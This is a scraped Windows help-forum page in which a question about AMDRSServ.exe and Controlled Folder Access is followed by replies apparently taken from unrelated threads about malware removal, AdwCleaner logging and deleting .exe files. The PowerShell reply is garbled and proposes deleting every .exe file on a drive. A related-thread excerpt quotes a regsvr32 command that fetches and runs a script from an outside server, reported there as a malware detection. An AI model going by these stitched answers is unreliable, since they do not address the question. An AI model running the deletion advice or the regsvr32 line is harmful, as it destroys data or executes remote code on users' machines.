Windows 10: AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware?

Discus and support AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware? in Windows 10 Gaming to solve the problem; this has been happening for the past months... Discussion in 'Windows 10 Gaming' started by Sem van den Berg1, May 14, 2025 at 3:52 AM.

  1. AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware?


    this has been happening for the past months

    :)
     
    Sem van den Berg1, May 14, 2025 at 3:52 AM
    #1

  2. Malware tprdpw64.exe after installing 7zip

    Thank you for the reply and the suggestions. However neither link provided a working solution. I followed each set of instructions step by step, to the T, but the viruses are still there.

    I killed the processes with Rkill as instructed, and it found and ended the malware process `tprdpw64.exe`. It, however, did nothing
    about the adware `svcvmx` & `svcvmx client` processes. After doing so I downloaded and installed Zemana, as instructed, and let it do a full system scan. Might I add that this took over
    10 hours to complete, as I have 1,396,541 files on my PC, so this whole thing wasted nearly half a day of my time with no results.

    Zemana detected the malware virus `tprdpw64.exe` located at "C:\WINDOWS\System32\tprdpw64.exe"
    (among other, smaller "threats"), and labeled it as malware. After it finished the scan, it said it has placed all files into quarantine, including `tprdpw64.exe`.
    However, when checking the quarantine list `tprdpw64.exe` is
    not listed. I then decided to have Zemana remove the files in the
    quarantine list from my system and then rebooted my PC. It removed them all successfully, except for `tprdpw64.exe`
    which is still on my system, and still runs (I can still see it in task manager after rebooting). So the 10+ hours of waiting were all for nothing.

    I then used Zemana's "drag-and-drop" feature to re-scan just `tprdpw64.exe`
    (in order to not have to wait 10+ hours again). It scanned it, and now says the file is not a threat (but it clearly is).

    I then proceeded to step 2, using AdwCleaner to remove the adware. This did not work in the slightest. AdwCleaner did not detect the adware virus at all, and thus did nothing about it. I still cannot remove the viruses manually, either. However for some
    reason, the adware `svcvmx` & `svcvmx client` processes no longer seem to run (my PC has been on for about an hour, and the processes
    have yet to startup). However, even so the files are still on my file system and would like to delete them.

    EDIT

    I have just searched my registry, looking for any possible signs of tprdpw64 being listed, and there was nothing there.
     
  3. Wisewiz Win User
    AdwCleaner: set to put Logs in folder with exe?

    Thanks, SoFine. That's an interesting idea.

    I'd have to put a long Pause in it, to let the executable finish, then the next two steps would move the files and then delete the empty folder.

    The more I consider it, the more I conclude that I'll just run the program (from my Tools drive) periodically, read the results, and then dump the C:\ folder. As with most things in life, it's no big deal.

    Thanks again.

    - - - Updated - - -

    Decided to try your suggestion. This worked perfectly: Log goes in the Logs folder in the same Tools drive folder as the executable, and the C:\AdwCleaner folder is deleted when it exists.

    Batch file text:

    @Echo off
    "D:\Malware Tools\AdwCleaner\AdwCleaner.exe" /scan /path "D:\Malware Tools\AdwCleaner"
    rd /s /q C:\AdwCleaner
    exit

    Found the info I needed by entering "D:\Malware Tools\AdwCleaner\AdwCleaner.exe" /?
    at the Command Prompt.


    AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware? 335423d1622480519t-adwcleaner-set-put-logs-folder-exe-clipboard-snapshot.jpg


    Thanks to all for the input.
     
  4. AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware?

    Remove .exe files caused by malware

    You may do it easily with PowerShell, try open Windows PowerShell as administrator and type the following:

    Remove-Item f:\malware\* -include .exe

    Make in f:\malware\* add the name of the driver and folder and * is meaning all subfolders within the malware folder. if you want it within the driver you may write something like f:\* and -include .exe will remove all files with .exe extension.
     
    Cyber_Defend_Team, May 14, 2025 at 3:55 AM
    #4
Thema:

AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware?

Loading...
  1. AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware? - Similar Threads - AMDRSServ exe controlled

  2. AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware?

    in Windows 10 Software and Apps
    AMDRSServ.exe controlled folder acces \Device\HarddiskVolume2 is this malware?: this has been happening for the past months https://answers.microsoft.com/en-us/windows/forum/all/amdrsservexe-controlled-folder-acces/5f455d46-3565-4c0b-bfaa-90c2c6b7ebd4
  3. destination folder acces denied

    in Windows 10 Software and Apps
    destination folder acces denied: My virus scanner moved a file of an application and I tried putting it back but then it gives the message: "destination folder acces denied". I am the administrator account on this computer and also the only account on this computer. I have already tried to give myself...
  4. Can’t Acces WindowsApps Folder

    in Windows 10 Gaming
    Can’t Acces WindowsApps Folder: Hello There, I’m just writing because I seem to be having problem’s accessing the WindowsApps folder even after handing over ownership to my Admin account. I can access properties and even edit everything in the properties tab but still can’t open the folder for some reason,...
  5. Can’t Acces WindowsApps Folder

    in Windows 10 Software and Apps
    Can’t Acces WindowsApps Folder: Hello There, I’m just writing because I seem to be having problem’s accessing the WindowsApps folder even after handing over ownership to my Admin account. I can access properties and even edit everything in the properties tab but still can’t open the folder for some reason,...
  6. regsvr32.exe as Malware

    in Windows 10 BSOD Crashes and Debugging
    regsvr32.exe as Malware: Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know...
  7. is Excelcnv exe malware?

    in AntiVirus, Firewalls and System Security
    is Excelcnv exe malware?: I have problems with my PC performance. Today I found a program file called excelcnv. I think it is malware but I am not sure. Can I delete this file? c:/programfiles(X86)/microsoftoffice/root/office16 Thank you....
  8. acces to windowsapps folder

    in AntiVirus, Firewalls and System Security
    acces to windowsapps folder: i just did a reboot, but still i have 150gb on my harddisk that i cant delete . i already have a windowsapps folder on my ssd where the system is installed. its just to old games that i cant open neither trough programs or windows store. i have changed security properties but...
  9. Controlled Folder Access w/ GPO: Multiple exes?

    in Windows 10 Customization
    Controlled Folder Access w/ GPO: Multiple exes?: I'm looking to configuring Controlled Folder Access for our organization, however we have programs that have multiple exes to them (like most programs) - like, in "C:\Program Files (x86)\Adobe\Adobe Reader DC", for example, has their main Reader.exe, but there's also other...
  10. Multiple .exe files trying to access my controlled folder

    in AntiVirus, Firewalls and System Security
    Multiple .exe files trying to access my controlled folder: I have no idea why this is happening, every time I boot or use my computer it shows that a .exe file is trying to go into my controlled folder and it was stopped. These are files such as explorer.exe, spotify.exe and adobe files. This is weird because there should be no...